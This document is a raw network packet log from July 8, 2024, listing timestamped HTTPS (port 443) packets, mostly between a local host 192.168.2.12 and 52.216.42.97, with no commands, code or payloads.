                            Jul 8, 2024 10:09:29.763529062 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.763549089 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.763628960 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.763633966 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.763695955 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.810528994 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.810564995 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.810637951 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.810647011 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.810692072 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.852454901 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.852488041 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.852619886 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.852619886 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.852632999 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.852670908 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.854399920 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.854422092 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.854497910 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.854497910 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.854504108 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.854758978 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.854779959 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.854851007 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.854856968 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.854896069 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.854896069 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.855544090 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.855566978 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.855612993 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.855618954 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.855634928 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.855704069 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.856714964 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.856731892 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.856779099 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.856785059 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.856796026 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.856883049 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.857186079 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.857203007 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.857270002 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.857270002 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.857275963 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.857322931 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.859257936 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.859278917 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.859318972 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.859327078 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.859343052 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.859369993 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.859889984 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.906286955 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.906306982 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.906378031 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.906387091 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.909039021 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.927400112 CEST44349730173.222.162.60192.168.2.12
                            Jul 8, 2024 10:09:29.927469969 CEST49730443192.168.2.12173.222.162.60
                            Jul 8, 2024 10:09:29.948575974 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.948596001 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.948674917 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.948683023 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.948709011 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.948725939 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.950495005 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.950509071 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.950581074 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.950587034 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.950923920 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.950999975 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.951015949 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.951061964 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.951066971 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.951085091 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.951117992 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.951795101 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.951809883 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.951852083 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.951855898 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.951867104 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.951911926 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.953067064 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.953080893 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.953140974 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.953155041 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.953967094 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.953988075 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.954035997 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.954041958 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.954092979 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.954092979 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.955945969 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.955960989 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.956065893 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:29.956072092 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:29.959155083 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.004404068 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.004446983 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.004491091 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.004499912 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.004512072 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.004539967 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.072197914 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.236135960 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.236159086 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.236233950 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.236241102 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.236283064 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.236305952 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.236358881 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.236376047 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.236433029 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.236447096 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.236509085 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.236664057 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.236680984 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.236733913 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.236738920 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.236958981 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.237168074 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.237181902 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.237250090 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.237260103 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.237267971 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.237287045 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.237332106 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.237332106 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.237340927 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.237390041 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.237945080 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.237960100 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.238022089 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.238027096 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.238065958 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.238085032 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.238126993 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.238132000 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.238158941 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.238223076 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.238935947 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.238966942 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.239000082 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.239003897 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.239049911 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.239069939 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.239082098 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.239097118 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.239135027 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.239135027 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.239183903 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.239811897 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.239828110 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.239887953 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.239893913 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.239943981 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.239960909 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.240010977 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.240015984 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.240051031 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.240051031 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.240739107 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.240753889 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.240816116 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.240834951 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.240843058 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.240904093 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.240904093 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.240940094 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.240953922 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.241033077 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.241038084 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.241808891 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.241830111 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.241894960 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.241899967 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.241925001 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.242300987 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.242322922 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.242368937 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.242376089 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.242404938 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.242436886 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.242454052 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.242691040 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.242697001 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.243247986 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.243263960 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.243335962 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.243339062 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.243350029 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.243388891 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.243396997 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.243412018 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.243417025 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.243459940 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.243459940 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.243585110 CEST49732443192.168.2.12216.58.212.132
                            Jul 8, 2024 10:09:30.243655920 CEST44349732216.58.212.132192.168.2.12
                            Jul 8, 2024 10:09:30.243768930 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.243786097 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.243844032 CEST49732443192.168.2.12216.58.212.132
                            Jul 8, 2024 10:09:30.243880033 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.243880033 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.243885040 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.243930101 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.243952990 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.243968964 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.244015932 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.244023085 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.244028091 CEST49732443192.168.2.12216.58.212.132
                            Jul 8, 2024 10:09:30.244030952 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.244045019 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.244051933 CEST44349732216.58.212.132192.168.2.12
                            Jul 8, 2024 10:09:30.244067907 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.244076014 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.244090080 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.244093895 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.244137049 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.244713068 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.244726896 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.244802952 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.244807959 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.244874001 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.291275978 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.291299105 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.291363955 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.291378021 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.291393995 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.291435003 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.332211971 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.332236052 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.332293034 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.332299948 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.332344055 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.332344055 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.333842039 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.333861113 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.333933115 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.333939075 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.334048986 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.334213018 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.334228992 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.334280968 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.334285021 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.334328890 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.334328890 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.335701942 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.335717916 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.335834026 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.335839033 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.335913897 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.336970091 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.336986065 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.337064028 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.337069035 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.337219954 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.337438107 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.337455034 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.337503910 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.337507963 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.337538958 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.337562084 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.339226007 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.339245081 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.339334011 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.339334011 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.339339972 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.339478970 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.387278080 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.387295961 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.387384892 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.387391090 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.387435913 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.427947998 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.427970886 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.428052902 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.428060055 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.428206921 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.429531097 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.429548979 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.429626942 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.429632902 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.429685116 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.429770947 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.429785967 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.429852009 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.429857016 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.429986000 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.431365013 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.431380033 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.431446075 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.431449890 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.431636095 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.432737112 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.432750940 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.432820082 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.432826042 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.432986021 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.433175087 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.433190107 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.433274031 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.433279037 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.433319092 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.433319092 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.434818029 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.434833050 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.434894085 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.434899092 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.435018063 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.483313084 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.483330011 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.483391047 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.483396053 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.483443022 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.523479939 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.523499966 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.523570061 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.523576975 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.523657084 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.525430918 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.525446892 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.525547981 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.525553942 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.525676966 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.527652025 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.527667999 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.527736902 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.527743101 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.527872086 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.528359890 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.528374910 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.528444052 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.528450012 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.528500080 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.529278994 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.529297113 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.529342890 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.529350042 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.529392004 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.529392004 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.529514074 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.529531002 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.529609919 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.529616117 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.529702902 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.530613899 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.530633926 CEST4434971352.216.42.97192.168.2.12
